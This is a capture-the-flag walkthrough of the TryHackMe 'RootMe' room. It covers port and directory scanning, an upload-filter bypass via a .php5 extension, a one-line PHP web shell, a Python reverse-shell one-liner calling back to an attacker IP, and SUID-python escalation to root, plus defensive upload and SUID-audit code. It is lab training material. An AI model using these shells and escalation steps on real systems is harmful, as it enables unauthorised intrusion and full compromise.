THM: RootMe

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.24.75 -oA nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 17:31 GMT
Nmap scan report for 10.10.24.75
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.28 seconds
Website
Since there are only 2 ports open, let's start with the website.
There is nothing really here: no links and nothing hidden in the source, so let's run a directory scan.
# gobuster dir -u http://10.10.24.75 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.24.75
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/css (Status: 301) [Size: 310] [--> http://10.10.24.75/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 309] [--> http://10.10.24.75/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.24.75/panel/]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.24.75/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Looking at /panel there is a simple form that allows uploads.
Uploading a basic image works and we can see it in the uploads directory. However, when we try to upload a basic PHP file it is blocked. It seems this check is based on the extension alone, as renaming the shell to shell.php5 works fine as an upload.
The PHP shell file is simply <?php echo system($_GET['cmd']); ?>
So with a working PHP shell it's just a case of finding a method to get a reverse shell to the box. In this case a Python reverse shell worked:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.18.78",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
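To show why the rename to shell.php5 worked, here is an added example (not code from the room or from this writeup) that reconstructs a hypothetical single-extension blocklist next to the allowlist-plus-magic-bytes check an upload form should use. The sample filenames and file bodies are constructed inline.

```python
import os
import secrets

# Constructed sample uploads: a real PNG header and the page's one-line PHP shell.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLE_UPLOADS = {
    "cat.png": PNG_MAGIC + b"\x00" * 16,
    "shell.php": b"<?php echo system($_GET['cmd']); ?>",
    "shell.php5": b"<?php echo system($_GET['cmd']); ?>",
    "shell.PhP": b"<?php echo system($_GET['cmd']); ?>",
}

# Hypothetical reconstruction of the weak check: a blocklist of one extension.
# Any alias Apache also routes to the PHP handler (.php5, .phtml, ...) slips through.
BLOCKED = {".php"}

def blocklist_allows(filename: str) -> bool:
    ext = os.path.splitext(filename)[1]
    return ext not in BLOCKED

# Hardened check: allowlist of image extensions, case-folded, and the body must
# start with the magic bytes that extension promises.
ALLOWED = {".png": PNG_MAGIC, ".jpg": b"\xff\xd8\xff",
           ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}

def allowlist_allows(filename: str, data: bytes) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    return magic is not None and data.startswith(magic)

def stored_name(filename: str) -> str:
    """Never reuse the client's name: random token plus the validated extension."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext

def audit() -> dict:
    """For each constructed sample: (blocklist verdict, allowlist verdict)."""
    return {name: (blocklist_allows(name), allowlist_allows(name, data))
            for name, data in SAMPLE_UPLOADS.items()}
```

Storing the validated file under stored_name() in a directory that Apache does not serve as PHP closes the remaining gap even if a bad extension ever gets through.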
User flag
Now we can have a look around the box. We see that we are connected as the www-data user, and after moving up a few directories we find the user flag:
bash-4.4$ pwd
pwd
/var/www/html/uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
Website.zip css index.php js panel uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
html user.txt
bash-4.4$ cat user.txt
cat user.txt
THM{y*************l}
Privilege escalation
Based on the room questions, we look for files with the SUID bit set:
bash-4.4$ find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
787696 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
787234 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
918336 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
787659 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
787841 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
787845 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
787467 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
787290 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
787288 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
787033 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
787084 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
787179 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
787431 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
787289 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
787306 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
787326 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9665/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9665/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9665/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9665/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9665/bin/umount
2605 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9665/usr/bin/chfn
2607 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9665/usr/bin/chsh
2683 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9665/usr/bin/gpasswd
2775 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9665/usr/bin/newgrp
2788 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9665/usr/bin/passwd
2898 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9665/usr/bin/sudo
2997 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3367 419 -rwsr-xr-x 1 root root 428240 May 26 2020 /snap/core/9665/usr/lib/openssh/ssh-keysign
6405 109 -rwsr-xr-x 1 root root 110656 Jul 10 2020 /snap/core/9665/usr/lib/snapd/snap-confine
7582 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9665/usr/sbin/pppd
786527 44 -rwsr-xr-x 1 root root 43088 Jan 8 2020 /bin/mount
786567 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
786500 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
786551 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
786585 28 -rwsr-xr-x 1 root root 26696 Jan 8 2020 /bin/umount
Looking through the list, /usr/bin/python stands out. So using GTFOBins we can privesc :)
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{p******************n}
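Spotting the odd binary in a long SUID listing by eye is error-prone, so here is an added example (not part of the writeup) that parses `find -perm -4000 -ls` output, keeps only setuid-root entries, and flags interpreters and anything outside an assumed stock baseline. The sample lines are a constructed subset of the listing above; the baseline set is an assumption, not a published reference list.

```python
import re

# Constructed sample: a subset of the `find / -type f -perm -4000 -ls` output above.
SAMPLE_FIND_LS = """\
787431 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
787033 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
786567 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
"""

# Assumed baseline of setuid-root binaries a stock Ubuntu 18.04 ships.
BASELINE = {"sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
            "umount", "ping", "ping6", "pkexec", "ssh-keysign", "snap-confine",
            "newuidmap", "newgidmap", "fusermount", "traceroute6.iputils",
            "polkit-agent-helper-1", "dbus-daemon-launch-helper", "lxc-user-nic",
            "dmcrypt-get-device", "pppd"}
# Interpreters and shells: setuid root on any of these is a root shell for everyone.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "bash", "sh", "node"}

# inode blocks perms links owner group size month day year|time path
LINE_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$")

def parse_find_ls(line: str):
    """Return owner/group/path and the setuid/setgid bits from one -ls line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    perms, owner, group, path = m.groups()
    return {"path": path, "owner": owner, "group": group,
            "setuid": perms[3] in "sS", "setgid": perms[6] in "sS"}

def audit_suid(text: str):
    """List (path, reason) for setuid-root files that are interpreters or off-baseline."""
    findings = []
    for line in text.splitlines():
        entry = parse_find_ls(line)
        if not entry or not (entry["setuid"] and entry["owner"] == "root"):
            continue
        name = entry["path"].rsplit("/", 1)[-1]
        if name in INTERPRETERS:
            findings.append((entry["path"], "setuid-root interpreter"))
        elif name not in BASELINE:
            findings.append((entry["path"], "not in baseline"))
    return findings
```

The fix for a finding like /usr/bin/python is simply `chmod u-s` on the file; running the audit from cron and diffing against the last run also catches a bit being added later.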